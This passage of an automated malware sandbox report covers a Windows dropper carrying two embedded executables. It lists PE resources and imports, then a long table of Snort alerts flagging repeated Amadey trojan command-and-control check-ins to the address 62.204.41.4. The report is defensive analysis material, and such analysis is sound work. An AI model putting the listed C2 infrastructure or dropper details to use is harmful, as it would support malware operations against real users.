RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x28bb0	0x5d0be	Microsoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0x85c70	0x4	data	English	United States
RT_RCDATA	0x85c74	0x24	data	English	United States
RT_RCDATA	0x85c98	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85ca0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85ca8	0x4	data	English	United States
RT_RCDATA	0x85cac	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cb8	0x4	data	English	United States
RT_RCDATA	0x85cbc	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cc8	0x4	data	English	United States
RT_RCDATA	0x85ccc	0x6	data	English	United States
RT_RCDATA	0x85cd4	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cdc	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x85ce4	0xbc	data	English	United States
RT_VERSION	0x85da0	0x408	data	English	United States
RT_VERSION	0x861a8	0x410	data	Russian	Russia
RT_MANIFEST	0x865b8	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.562.204.41.449780802027700 02/07/23-19:57:25.243032	TCP	2027700	ET TROJAN Amadey CnC Check-In	49780	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450240802027700 02/07/23-19:59:33.419821	TCP	2027700	ET TROJAN Amadey CnC Check-In	50240	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449814802027700 02/07/23-19:57:35.140362	TCP	2027700	ET TROJAN Amadey CnC Check-In	49814	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449912802027700 02/07/23-19:58:02.026161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49912	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449909802027700 02/07/23-19:58:01.309254	TCP	2027700	ET TROJAN Amadey CnC Check-In	49909	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450237802027700 02/07/23-19:59:32.701921	TCP	2027700	ET TROJAN Amadey CnC Check-In	50237	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450433802027700 02/07/23-20:00:26.461663	TCP	2027700	ET TROJAN Amadey CnC Check-In	50433	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450139802027700 02/07/23-19:59:06.422233	TCP	2027700	ET TROJAN Amadey CnC Check-In	50139	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450209802027700 02/07/23-19:59:25.926205	TCP	2027700	ET TROJAN Amadey CnC Check-In	50209	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450335802027700 02/07/23-19:59:58.469497	TCP	2027700	ET TROJAN Amadey CnC Check-In	50335	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450175802027700 02/07/23-19:59:15.074931	TCP	2027700	ET TROJAN Amadey CnC Check-In	50175	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450307802027700 02/07/23-19:59:51.711604	TCP	2027700	ET TROJAN Amadey CnC Check-In	50307	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449847802027700 02/07/23-19:57:43.302254	TCP	2027700	ET TROJAN Amadey CnC Check-In	49847	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449749802027700 02/07/23-19:57:17.867893	TCP	2027700	ET TROJAN Amadey CnC Check-In	49749	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450466802027700 02/07/23-20:00:34.175411	TCP	2027700	ET TROJAN Amadey CnC Check-In	50466	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450016802027700 02/07/23-19:58:31.545050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50016	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450114802027700 02/07/23-19:58:57.604605	TCP	2027700	ET TROJAN Amadey CnC Check-In	50114	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450212802027700 02/07/23-19:59:26.656555	TCP	2027700	ET TROJAN Amadey CnC Check-In	50212	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450368802027700 02/07/23-20:00:08.721533	TCP	2027700	ET TROJAN Amadey CnC Check-In	50368	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450273802027700 02/07/23-19:59:41.686869	TCP	2027700	ET TROJAN Amadey CnC Check-In	50273	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450371802027700 02/07/23-20:00:09.426162	TCP	2027700	ET TROJAN Amadey CnC Check-In	50371	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450077802027700 02/07/23-19:58:48.624595	TCP	2027700	ET TROJAN Amadey CnC Check-In	50077	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450170802027700 02/07/23-19:59:13.888323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50170	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450310802027700 02/07/23-19:59:52.435304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50310	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449945802027700 02/07/23-19:58:12.060541	TCP	2027700	ET TROJAN Amadey CnC Check-In	49945	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450458802027700 02/07/23-20:00:32.245201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50458	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449839802027700 02/07/23-19:57:41.005570	TCP	2027700	ET TROJAN Amadey CnC Check-In	49839	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450167802027700 02/07/23-19:59:13.182938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50167	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450072802027700 02/07/23-19:58:47.386919	TCP	2027700	ET TROJAN Amadey CnC Check-In	50072	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450049802027700 02/07/23-19:58:39.386685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50049	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450008802027700 02/07/23-19:58:29.531823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50008	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450204802027700 02/07/23-19:59:22.348680	TCP	2027700	ET TROJAN Amadey CnC Check-In	50204	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450400802027700 02/07/23-20:00:16.471395	TCP	2027700	ET TROJAN Amadey CnC Check-In	50400	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449744802027700 02/07/23-19:57:16.664080	TCP	2027700	ET TROJAN Amadey CnC Check-In	49744	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449940802027700 02/07/23-19:58:10.825829	TCP	2027700	ET TROJAN Amadey CnC Check-In	49940	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449998802027700 02/07/23-19:58:27.044687	TCP	2027700	ET TROJAN Amadey CnC Check-In	49998	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449822802027700 02/07/23-19:57:36.840230	TCP	2027700	ET TROJAN Amadey CnC Check-In	49822	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450150802027700 02/07/23-19:59:09.040992	TCP	2027700	ET TROJAN Amadey CnC Check-In	50150	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450363802027700 02/07/23-20:00:07.542076	TCP	2027700	ET TROJAN Amadey CnC Check-In	50363	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450080802027700 02/07/23-19:58:49.338343	TCP	2027700	ET TROJAN Amadey CnC Check-In	50080	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450405802027700 02/07/23-20:00:17.657437	TCP	2027700	ET TROJAN Amadey CnC Check-In	50405	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450441802027700 02/07/23-20:00:28.375723	TCP	2027700	ET TROJAN Amadey CnC Check-In	50441	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449870802027700 02/07/23-19:57:52.051772	TCP	2027700	ET TROJAN Amadey CnC Check-In	49870	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450044802027700 02/07/23-19:58:38.182720	TCP	2027700	ET TROJAN Amadey CnC Check-In	50044	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449917802027700 02/07/23-19:58:03.280189	TCP	2027700	ET TROJAN Amadey CnC Check-In	49917	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450245802027700 02/07/23-19:59:34.591841	TCP	2027700	ET TROJAN Amadey CnC Check-In	50245	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449875802027700 02/07/23-19:57:53.010907	TCP	2027700	ET TROJAN Amadey CnC Check-In	49875	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450298802027700 02/07/23-19:59:49.514228	TCP	2027700	ET TROJAN Amadey CnC Check-In	50298	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449757802027700 02/07/23-19:57:19.196421	TCP	2027700	ET TROJAN Amadey CnC Check-In	49757	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450024802027700 02/07/23-19:58:33.541536	TCP	2027700	ET TROJAN Amadey CnC Check-In	50024	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450315802027700 02/07/23-19:59:53.640304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50315	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450085802027700 02/07/23-19:58:50.542002	TCP	2027700	ET TROJAN Amadey CnC Check-In	50085	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450413802027700 02/07/23-20:00:19.937795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50413	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449867802027700 02/07/23-19:57:51.323673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49867	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450195802027700 02/07/23-19:59:19.673213	TCP	2027700	ET TROJAN Amadey CnC Check-In	50195	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449711802027700 02/07/23-19:57:09.336516	TCP	2027700	ET TROJAN Amadey CnC Check-In	49711	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449895802027700 02/07/23-19:57:57.922450	TCP	2027700	ET TROJAN Amadey CnC Check-In	49895	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449965802027700 02/07/23-19:58:16.796475	TCP	2027700	ET TROJAN Amadey CnC Check-In	49965	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450293802027700 02/07/23-19:59:48.325220	TCP	2027700	ET TROJAN Amadey CnC Check-In	50293	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450122802027700 02/07/23-19:58:59.516632	TCP	2027700	ET TROJAN Amadey CnC Check-In	50122	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450278802027700 02/07/23-19:59:44.686906	TCP	2027700	ET TROJAN Amadey CnC Check-In	50278	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450376802027700 02/07/23-20:00:10.676242	TCP	2027700	ET TROJAN Amadey CnC Check-In	50376	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450232802027700 02/07/23-19:59:31.467525	TCP	2027700	ET TROJAN Amadey CnC Check-In	50232	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449729802027700 02/07/23-19:57:13.008119	TCP	2027700	ET TROJAN Amadey CnC Check-In	49729	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449981802027700 02/07/23-19:58:20.676823	TCP	2027700	ET TROJAN Amadey CnC Check-In	49981	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450330802027700 02/07/23-19:59:57.254968	TCP	2027700	ET TROJAN Amadey CnC Check-In	50330	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450229802027700 02/07/23-19:59:30.761202	TCP	2027700	ET TROJAN Amadey CnC Check-In	50229	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450057802027700 02/07/23-19:58:41.341646	TCP	2027700	ET TROJAN Amadey CnC Check-In	50057	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449904802027700 02/07/23-19:58:00.083813	TCP	2027700	ET TROJAN Amadey CnC Check-In	49904	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449732802027700 02/07/23-19:57:13.710639	TCP	2027700	ET TROJAN Amadey CnC Check-In	49732	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449830802027700 02/07/23-19:57:38.830731	TCP	2027700	ET TROJAN Amadey CnC Check-In	49830	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449986802027700 02/07/23-19:58:21.857184	TCP	2027700	ET TROJAN Amadey CnC Check-In	49986	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450265802027700 02/07/23-19:59:39.451988	TCP	2027700	ET TROJAN Amadey CnC Check-In	50265	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449937802027700 02/07/23-19:58:10.104815	TCP	2027700	ET TROJAN Amadey CnC Check-In	49937	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449862802027700 02/07/23-19:57:50.104682	TCP	2027700	ET TROJAN Amadey CnC Check-In	49862	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450302802027700 02/07/23-19:59:50.470972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50302	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450060802027700 02/07/23-19:58:42.295231	TCP	2027700	ET TROJAN Amadey CnC Check-In	50060	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450190802027700 02/07/23-19:59:18.716317	TCP	2027700	ET TROJAN Amadey CnC Check-In	50190	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449978802027700 02/07/23-19:58:19.951026	TCP	2027700	ET TROJAN Amadey CnC Check-In	49978	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449724802027700 02/07/23-19:57:11.745483	TCP	2027700	ET TROJAN Amadey CnC Check-In	49724	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450011802027700 02/07/23-19:58:30.290364	TCP	2027700	ET TROJAN Amadey CnC Check-In	50011	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450224802027700 02/07/23-19:59:29.577696	TCP	2027700	ET TROJAN Amadey CnC Check-In	50224	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450052802027700 02/07/23-19:58:40.105001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50052	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450348802027700 02/07/23-20:00:03.954544	TCP	2027700	ET TROJAN Amadey CnC Check-In	50348	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450159802027700 02/07/23-19:59:11.230109	TCP	2027700	ET TROJAN Amadey CnC Check-In	50159	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450384802027700 02/07/23-20:00:12.627471	TCP	2027700	ET TROJAN Amadey CnC Check-In	50384	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449765802027700 02/07/23-19:57:20.854177	TCP	2027700	ET TROJAN Amadey CnC Check-In	49765	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450029802027700 02/07/23-19:58:34.809953	TCP	2027700	ET TROJAN Amadey CnC Check-In	50029	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450130802027700 02/07/23-19:59:01.720565	TCP	2027700	ET TROJAN Amadey CnC Check-In	50130	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450343802027700 02/07/23-20:00:00.779938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50343	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450421802027700 02/07/23-20:00:23.597298	TCP	2027700	ET TROJAN Amadey CnC Check-In	50421	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450260802027700 02/07/23-19:59:38.219727	TCP	2027700	ET TROJAN Amadey CnC Check-In	50260	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449932802027700 02/07/23-19:58:09.150327	TCP	2027700	ET TROJAN Amadey CnC Check-In	49932	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449890802027700 02/07/23-19:57:56.718243	TCP	2027700	ET TROJAN Amadey CnC Check-In	49890	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449802802027700 02/07/23-19:57:32.212401	TCP	2027700	ET TROJAN Amadey CnC Check-In	49802	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449760802027700 02/07/23-19:57:19.749026	TCP	2027700	ET TROJAN Amadey CnC Check-In	49760	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449973802027700 02/07/23-19:58:18.734052	TCP	2027700	ET TROJAN Amadey CnC Check-In	49973	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449728802027700 02/07/23-19:57:12.773087	TCP	2027700	ET TROJAN Amadey CnC Check-In	49728	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449985802027700 02/07/23-19:58:21.623964	TCP	2027700	ET TROJAN Amadey CnC Check-In	49985	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449731802027700 02/07/23-19:57:13.477085	TCP	2027700	ET TROJAN Amadey CnC Check-In	49731	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449798802027700 02/07/23-19:57:31.270025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49798	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449887802027700 02/07/23-19:57:55.996115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49887	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450249802027700 02/07/23-19:59:35.548839	TCP	2027700	ET TROJAN Amadey CnC Check-In	50249	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450347802027700 02/07/23-20:00:03.721907	TCP	2027700	ET TROJAN Amadey CnC Check-In	50347	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450445802027700 02/07/23-20:00:29.348634	TCP	2027700	ET TROJAN Amadey CnC Check-In	50445	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449896802027700 02/07/23-19:57:58.170170	TCP	2027700	ET TROJAN Amadey CnC Check-In	49896	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450350802027700 02/07/23-20:00:04.422898	TCP	2027700	ET TROJAN Amadey CnC Check-In	50350	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449737802027700 02/07/23-19:57:14.935623	TCP	2027700	ET TROJAN Amadey CnC Check-In	49737	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450252802027700 02/07/23-19:59:36.278597	TCP	2027700	ET TROJAN Amadey CnC Check-In	50252	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449826802027700 02/07/23-19:57:37.847264	TCP	2027700	ET TROJAN Amadey CnC Check-In	49826	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450163802027700 02/07/23-19:59:12.188385	TCP	2027700	ET TROJAN Amadey CnC Check-In	50163	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450191802027700 02/07/23-19:59:18.961060	TCP	2027700	ET TROJAN Amadey CnC Check-In	50191	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450261802027700 02/07/23-19:59:38.469324	TCP	2027700	ET TROJAN Amadey CnC Check-In	50261	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450093802027700 02/07/23-19:58:52.513268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50093	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450280802027700 02/07/23-19:59:45.156579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50280	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449859802027700 02/07/23-19:57:49.355361	TCP	2027700	ET TROJAN Amadey CnC Check-In	49859	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450356802027700 02/07/23-20:00:05.846184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50356	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450004802027700 02/07/23-19:58:28.516743	TCP	2027700	ET TROJAN Amadey CnC Check-In	50004	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450102802027700 02/07/23-19:58:54.714299	TCP	2027700	ET TROJAN Amadey CnC Check-In	50102	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450258802027700 02/07/23-19:59:37.739913	TCP	2027700	ET TROJAN Amadey CnC Check-In	50258	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450089802027700 02/07/23-19:58:51.531272	TCP	2027700	ET TROJAN Amadey CnC Check-In	50089	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449960802027700 02/07/23-19:58:15.604284	TCP	2027700	ET TROJAN Amadey CnC Check-In	49960	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449868802027700 02/07/23-19:57:51.563260	TCP	2027700	ET TROJAN Amadey CnC Check-In	49868	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450328802027700 02/07/23-19:59:56.770342	TCP	2027700	ET TROJAN Amadey CnC Check-In	50328	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449709802027700 02/07/23-19:57:08.852068	TCP	2027700	ET TROJAN Amadey CnC Check-In	49709	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449703802027700 02/07/23-19:57:06.000700	TCP	2027700	ET TROJAN Amadey CnC Check-In	49703	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449810802027700 02/07/23-19:57:34.139598	TCP	2027700	ET TROJAN Amadey CnC Check-In	49810	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449957802027700 02/07/23-19:58:14.905022	TCP	2027700	ET TROJAN Amadey CnC Check-In	49957	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450417802027700 02/07/23-20:00:22.516624	TCP	2027700	ET TROJAN Amadey CnC Check-In	50417	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450092802027700 02/07/23-19:58:52.278298	TCP	2027700	ET TROJAN Amadey CnC Check-In	50092	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450179802027700 02/07/23-19:59:16.043396	TCP	2027700	ET TROJAN Amadey CnC Check-In	50179	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449827802027700 02/07/23-19:57:38.087800	TCP	2027700	ET TROJAN Amadey CnC Check-In	49827	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450322802027700 02/07/23-19:59:55.303213	TCP	2027700	ET TROJAN Amadey CnC Check-In	50322	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450233802027700 02/07/23-19:59:31.718708	TCP	2027700	ET TROJAN Amadey CnC Check-In	50233	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450418802027700 02/07/23-20:00:22.859106	TCP	2027700	ET TROJAN Amadey CnC Check-In	50418	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450446802027700 02/07/23-20:00:29.582178	TCP	2027700	ET TROJAN Amadey CnC Check-In	50446	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449929802027700 02/07/23-19:58:08.454291	TCP	2027700	ET TROJAN Amadey CnC Check-In	49929	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450286802027700 02/07/23-19:59:46.657209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50286	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449797802027700 02/07/23-19:57:31.010574	TCP	2027700	ET TROJAN Amadey CnC Check-In	49797	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450032802027700 02/07/23-19:58:35.551488	TCP	2027700	ET TROJAN Amadey CnC Check-In	50032	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449740802027700 02/07/23-19:57:15.662783	TCP	2027700	ET TROJAN Amadey CnC Check-In	49740	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449994802027700 02/07/23-19:58:24.905756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49994	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450121802027700 02/07/23-19:58:59.277722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50121	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450162802027700 02/07/23-19:59:11.945539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50162	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450375802027700 02/07/23-20:00:10.441776	TCP	2027700	ET TROJAN Amadey CnC Check-In	50375	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450073802027700 02/07/23-19:58:47.629161	TCP	2027700	ET TROJAN Amadey CnC Check-In	50073	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449900802027700 02/07/23-19:57:59.126282	TCP	2027700	ET TROJAN Amadey CnC Check-In	49900	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449941802027700 02/07/23-19:58:11.058629	TCP	2027700	ET TROJAN Amadey CnC Check-In	49941	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450217802027700 02/07/23-19:59:27.889673	TCP	2027700	ET TROJAN Amadey CnC Check-In	50217	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449953802027700 02/07/23-19:58:13.951278	TCP	2027700	ET TROJAN Amadey CnC Check-In	49953	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449944802027700 02/07/23-19:58:11.828444	TCP	2027700	ET TROJAN Amadey CnC Check-In	49944	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450119802027700 02/07/23-19:58:58.794403	TCP	2027700	ET TROJAN Amadey CnC Check-In	50119	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449855802027700 02/07/23-19:57:48.404554	TCP	2027700	ET TROJAN Amadey CnC Check-In	49855	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450306802027700 02/07/23-19:59:51.473442	TCP	2027700	ET TROJAN Amadey CnC Check-In	50306	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450036802027700 02/07/23-19:58:36.277046	TCP	2027700	ET TROJAN Amadey CnC Check-In	50036	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450208802027700 02/07/23-19:59:25.676246	TCP	2027700	ET TROJAN Amadey CnC Check-In	50208	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449769802027700 02/07/23-19:57:21.585123	TCP	2027700	ET TROJAN Amadey CnC Check-In	49769	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449938802027700 02/07/23-19:58:10.348630	TCP	2027700	ET TROJAN Amadey CnC Check-In	49938	80	192.168.2.5	62.204.41.4
